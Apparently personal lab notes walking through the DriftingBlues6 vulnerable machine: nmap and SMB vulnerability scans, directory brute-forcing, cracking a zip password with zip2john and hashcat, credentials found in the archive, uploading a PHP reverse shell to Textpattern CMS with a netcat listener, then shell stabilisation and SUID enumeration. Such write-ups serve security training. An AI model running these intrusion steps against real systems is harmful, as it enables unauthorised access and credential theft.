๐ŸฆDriftingBlues6

Nmap -sC -sV -A -oN <ip X.x.x.z>

Nmap -sC -sV -A -p- 1-65535 -oN <ip X.x.x.z>

nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10

nmap -sV -sT -p445 --script vuln <ip>
nmap -sV -sT -p445 --script safe <ip>
nmap -sV -sT -p445 --script "vuln and safe" <ip>

nmap -p 21,22,80 -sC -sV -A -o nmapscripts.txt 192.168.221.219

Enumerate Port 80

will try using the stegnography for the image

steghide extract -sf db.jpeg

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.221.219/

/index

/db

/robots

/spammer

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.221.219/FUZZ -fl 480

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.221.219/FUZZ

dirb http://192.168.221.219/

dirsearch -u http://192.168.221.219/ -e php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Web technologies To Identify

whatweb -a 3 http://192.168.221.219/

Web technologies WAF To Identify

wafw00f -a http://192.168.221.219/

CMS scanning tools

Clusterd, CMSScan, VulnX, droopescan, joomlavs, wpscan, cmsmap

./clusterd.py [options] vulnx -u http://example.com droopescan scan drupal -u http://example.org/ ruby joomlavs.rb -u examplejoomla.com --scan-all wpscan --url http://examplewordpress.com/ -e u,ap,at cmsmap.py https://example.com

wpscan --url http://192.168.221.219/ -e u,ap,at

Will try to navigate the identified the directories

/textpattern/textpattern

unzip spammer.zip

Attempting to unzip it, I found it was password protected.

Will try to use zip2john to get the password hash.

zip2john spammer.zip

zip2john spammer.zip > spammer4john

Delete everything in the hash file before the initial $, which made it readable for Hashcat.

hashcat spammer4john -m 17225 /usr/share/wordlists/rockyou.txt

Hashcat very quickly cracked the hash and revealed the password to the zip file. Its โ€˜myspace4โ€™.

Now we will unzip the spammer file using the above password

mayer:lionheart

Textpattern CMS v4.8.3 will try to find the eploit

http://192.168.221.219/textpattern/textpattern/index.php?event=file192.168.221.219

run nc -nvlp 4444

http://192.168.221.219/textpattern/files/php-reverse-shell.php192.168.221.219

Once clicked above link

will run the stalize shell command

python -c 'import pty; pty.spawn("/bin/bash")'

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp

export TERM=xterm-256color

ctrl+z

stty raw -echo ; fg ; reset

stty columns 200 rows 200

Escalation

After stabilizing my shell, I started my escalation by checking for SUID binaries, trying to see if anything stood out as vulnerable.

find / -perm -u=s 2>/dev/null

PreviousInsanityHostingNextTre

Last updated

Was this helpful?